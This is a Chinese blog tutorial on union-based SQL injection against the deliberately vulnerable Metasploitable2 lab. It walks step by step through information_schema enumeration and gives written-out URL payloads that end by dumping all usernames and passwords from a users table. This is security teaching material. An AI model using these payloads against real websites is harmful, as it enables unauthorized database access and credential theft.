web安全入门之SQL注入-基于metasploitable2-Linux

最新推荐文章于 2024-04-18 23:31:53 发布
最新推荐文章于 2024-04-18 23:31:53 发布
阅读量1k 收藏 2
点赞数 3
分类专栏: web安全-SQL注入 文章标签: 安全 SQL注入 数据库 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43726831/article/details/100641626
版权

SQL注入

1.SQL注入介绍

我们在学习SQL注入前,先要对SQL以及数据库有一定的了解。
SQL(Structured Query Language)是一种关系数据库标准语言,SQL其为结构化的查询语言的简称,但其功能包括数据定义,数据查询,数据操纵和数据控制四部分。SQL简洁方便、功能齐全,是目前应用最广的关系数据库语言。

数据定义SQL(DDL):CREATE(创建)、DROP(丢弃)
数据查询SQL(DQL):SELECT(查询)
数据操纵SQL(DML):INSERT(插入)、UPDATE(修改)、DELETE(删除)等
数据控制SQL(DCL):GRANT(授权)、REVOKE(撤销授权)等

2.mysql系统数据库

SQL注入中最常见的为利用系统数据库,经常利用系统数据库配合union 联合查询获得数据库相关信息,系统数据库的所有信息都在这个数据库中,比如所有数据库的库名,表名,以及列名的数据库类型等
MYsql中的系统数据库为information_schema

information_schema的三张表

1.Information_schema.schemata表提供了关于数据库的信息,我们可以在其中找出 schema_name列,其中存放了所有的数据库名称,查询到这个列的值,即找到的所有的数据库名

2.information_schema.tables表提供了数据库中表的信息,我们在知道数据库名的情况下,可以找出这个数据库中所有的表名,此时在这个表中数据库名对应的值为table_schema,所有表名对应的值为table_name

3.information_schema.columns表提供了表中列的信息,我们在知道数据库名以及表名的情况,可以找出这个库中该表的列的信息,同时包含数据库名,所有列名值对应列column_name,所有数据库名值对应列table_schema,所有表名值对应table_name列,当然此表还有其他列的信息
在这里插入图片描述
在这里插入图片描述

3.在web网页中通过SQL注入读出数据

我们一般不可能知道其数据库用户的用户名和其密码,所以只能在网页中通过SQL注入的方式来获取用户名和密码,Metasploitable2-Linux提供了Less-1 - Less 22不同难度的版本,循序渐进,从简到难。
在之后的博客中将逐一针对于每个Less进行分析,当前先了解一下
在这里插入图片描述

4.SQL注入步骤

在这里插入图片描述

(1).求闭合方式

闭合方式包括’ ’ " " ( ) [ ] { } (’ ')等;

一般求闭合语句 /?id=1 ’ and 1=1 --+,以该闭合为例,当页面显示正常输出时,则闭合方式为’’,当页面出现错误结果时,则测试其他闭合方式。

(2).二分法求表的列数

求列数语句/?id=1’order by 10 --+

不出结果表明数大,则减小一半,依次进行,直到查出列数为止。

(3).观察显示位(假设上一步测试出结果为3列)

求显示位语句/id=-1’union all select 1,2,3 --+

id=-1使前面的结果不显示,即将前查询id置为-1,只显示后面输出结果,如果显示2,3则表示显示位为2,3

(4).寻找库函数-在系统数据库information_shcema.schemata表中寻找

/?id=-1’ union all select 1,2,group_concat(schema_name) from information_schema.schemata --+
或者
/?id=-1’ union all select 1,2,database() from information_schema.schemata --+

查找出结果为security

(5).寻找表-在系统数据库information_schema.tables表中寻找

/?id=-1’ union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+

查找出结果为emails,referers,uagents,users

(6).寻找列-在系统数据库information_schema.columns表中寻找

/?id=-1’ union all select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’–+

查找出结果为id,username,password

(7).已知数据库和表和列,读出数据

/?id=-1’ union all select 1,group_concat(username),group_concat(password) from security.users–+

可以读出所有的用户名和密码

小边同学
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
metasploitable-linux-2.0.0.zip
09-01
metasploitable-linux,metasploitable-linuxmetasploitable-linux metasploitable-linux
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1767
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
Metasploit 内网渗透一 ——基础环境配置、渗透过程中遇到的配置问题处理、kali中MSF基础命令
最新发布
天下著书立传者,皆为我师
04-18 395
Metasploitable2-linux:攻击机 192.168.234.8。kali-debian:攻击机 192.168.234.141。修改网卡后,需要重启网卡:service networking restart。win7 虚拟机:靶机 192.168.234.158。注:win7靶机需要关闭防火墙,kali才能ping通。同时还需要配置虚拟机网络。
利用漏洞注入(sql注入
xianyunb的博客
06-21 346
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者。
SQL注入之了解数据库数据库查询流程、注入了解(基于Metasploitable2-Linux
qq_43578780的博客
11-21 332
1、数据库和SQL的基本了解 我们在学习SQL注入之前,先要对数据库和SQL进行一定的了解。 (1)数据库 Oracal(大型):它是在数据库领域一直处于领先地位的产品,系统可移植性好、使用方便、功能强,适用于各类大、中、小、微机环境。它是一种高效率、可靠性好的、适应高吞吐量的数据库方案。 MySQL(开源,常用):是一种开放源代码的关系型数据库管理系统(RDBMS),使用最常用的数据库管理语言–...
Metasploit渗透测试框架
qq_44237206的博客
05-16 496
Metasploit简介 Metasploit是一个渗透测试平台,使您能够查找,利用和验证漏洞。该平台包括Metasploit框架及其商业对手,如Metasploit Pro。 Metasploit是一个免费的、可下载的框架,通过它可以很容易对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补..
SQL注入部分:DVWA+SQLmap+Mysql注入实战
qq_51650968的博客
12-04 853
实验环境搭建。启动Metasploitable2虚拟机 首先在kali上扫描到metasploitable2的ip地址 nmap 192.168.75.0/24 找到靶机ip 在kali的firefox浏览器上搜索ip地址并打开DVWA 在DVWA Security上修改安全等级为low 然后进行注入点发现 在SQL Injection上id搜索1 可以看见上方地址栏有显示id=1 再次输入1,报错,返回 You have an error in your SQL syntax; check th
SQL注入-初入web安全-详细知识图谱
11-06
SQL注入初入Web安全详细知识图谱 SQL注入是一种常见的Web应用安全漏洞,指的是攻击者通过构造特殊的输入参数,来改变原始的SQL语句,使得数据库服务器执行恶意的SQL语句,从而达到非法访问或控制数据库的目的。SQL...
计算机-mysql-基于Web应用的SQL注入攻击入侵检测研究.pdf
07-08
基于Web应用的SQL注入攻击入侵检测研究是当前Web应用安全研究的热点之一。论文通过对SQL注入攻击的基本概念和原理、基于Web应用的SQL注入攻击的影响和危害、基于动态查询匹配的SQL注入攻击检测方法、基于Web应用的...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
网络安全kali渗透学习 web渗透入门Metasploitable2靶机系统介绍
xueshenlaila的博客
02-24 4181
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox和其他虚拟平台。 这篇文章教大家了解Metasploitable2靶机系统 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/kali/黑客/web安全/渗透测试/-3-5个月网络安全全套
SQL注入的环境搭建与简单操作
qq_51627527的博客
12-16 655
SQL注入:DVWA+SQLmap+Mysql注入实战 实验环境搭建。启动Metasploitable2虚拟机。
Metasploitable2 靶机漏洞(上)
Fly_鹏程万里
05-02 7308
此次演示环境 1、靶机: Metasploitable2-Linux IP:192.168.160.131 2、攻击演示系统 Kali Linux 1.0.9 一、弱密码漏洞(Weak Password) 安全组织索引 CVE: OSVDB: BID: 原理: 系统或者数据库的登录用户,密码简单或者用户名与密码相同,容易通过暴...
kali利用ftp端口(21)漏洞攻击Metasploitable2-Linux靶机(笑脸漏洞)
qq_58018041的博客
04-22 3560
#vsftpd源码包含后门漏洞#思路:开放21端口,并且vsftpd版本号为2.3.4#原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。攻击机:kali :192.168.111.128靶机:Metasploitable2-Linux:192.168.111.132Metasploitable 的用户名和密码均为:msfadmin。
Metasploitable-linux-2.0.0靶机配置教程
draper-crypto的博客
01-04 1402
metasploitable-linux-2.0.0配置
SQL注入之联合查询法(基于Metasploitable2-Linux
qq_43578780的博客
11-24 361
1、联合查询 在之前的文章中,我们已经学习了SQL注入的基本步骤,而联合查询法其基本步骤一样。 分别是:猜闭合方式、用二分法来猜测表的列数、观察显示位、寻找数据库、寻找表、寻找列、寻找数据 2、用联合查询的方式在Metasploitable2-Linux的Less-1中进行SQL注入 (1):猜闭合方式 在一般情况下,我们要进行SQL注入是无法得知闭合方式的,所以我们一般用手工进行不断的猜测,或用...
[第一章 web入门]sql注入-2
03-16
SQL注入是一种常见的网络攻击方式,攻击...为了防止SQL注入攻击,我们需要对输入进行过滤和验证,同时使用参数化查询等安全措施来保护数据库安全。在开发过程中,我们也需要注意代码的安全性,避免出现SQL注入漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值